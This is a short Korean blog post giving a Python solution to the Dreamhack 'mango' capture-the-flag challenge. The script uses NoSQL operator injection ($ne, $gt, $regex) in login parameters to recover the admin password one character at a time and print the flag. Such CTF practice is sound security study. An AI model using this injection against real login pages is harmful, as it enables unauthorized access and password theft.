호그와트
드림핵 mango 쉬워요
영웅*^%&$
2022. 4. 6. 22:56
728x90
import requests
import string
url = "http://host1.dreamhack.games:22637/login"
s = string.digits + string.ascii_uppercase + string.ascii_lowercase + "{}"
result = ""
for i in range(32):
for idx, c in enumerate(s):
payload = "?uid[$gt]=adm&uid[$ne]=guest&uid[$lt]=d&upw[$regex]={" + (result+c)
print(payload)
res = requests.get(url+payload)
if res.text.find("admin") != -1:
result += s[idx]
print(result)
break
flag = "DH" + result + "}"
print(flag)
728x90